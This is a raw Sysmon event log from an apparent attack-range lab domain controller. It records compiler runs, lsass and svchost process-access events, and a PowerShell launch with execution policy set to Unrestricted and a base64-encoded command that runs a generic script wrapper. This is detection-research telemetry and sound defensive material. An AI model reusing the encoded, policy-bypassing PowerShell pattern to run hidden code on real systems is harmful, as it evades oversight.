11:59:59.591{266CAFBE-643F-6064-D302-00000000AD01}40401568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{266CAFBE-643F-6064-D402-00000000AD01}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b46d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3db4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3f2c|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+4002|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2804|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2948|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7fe06|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+4726f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45e1f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45b16|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45826|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1938a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18bf6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+a831|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1f0a49|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.595{266CAFBE-643F-6064-D402-00000000AD01}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESCC40.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC256FC59F54DB41CB8ECA1DDFF829C17D.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-643E-6064-F4EC-110000000000}0x11ecf40HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{266CAFBE-643F-6064-D302-00000000AD01}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\j15iut5x.cmdline" 10341000x8000000000000000448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-643E-6064-CE02-00000000AD01}21644624C:\Windows\system32\conhost.exe{266CAFBE-643F-6064-D302-00000000AD01}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-643F-6064-D302-00000000AD01}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-643E-6064-D102-00000000AD01}16042728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-643F-6064-D302-00000000AD01}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be405|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be05f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb80|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb08|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bc1c3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d8ed2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d894a|UNKNOWN(00007FF893A6BB0F) 154100x8000000000000000436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.500{266CAFBE-643F-6064-D302-00000000AD01}4040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\j15iut5x.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-643E-6064-F4EC-110000000000}0x11ecf40HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 23542300x8000000000000000435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-641B-6064-3202-00000000AD01}5032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FFAA91A396C09501E37F90A043FAE8A5,SHA256=88A675CBBCBD086EBE6A47585E8C09658D0149FF8A69C8C1E036C125EE8A5221,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.497{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.cmdline2021-03-31 11:59:59.497 11241100x8000000000000000433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 11:59:59.497{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\j15iut5x.dll2021-03-31 11:59:59.497 10341000x8000000000000000432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-643E-6064-CE02-00000000AD01}21644624C:\Windows\system32\conhost.exe{266CAFBE-643F-6064-D202-00000000AD01}4608C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 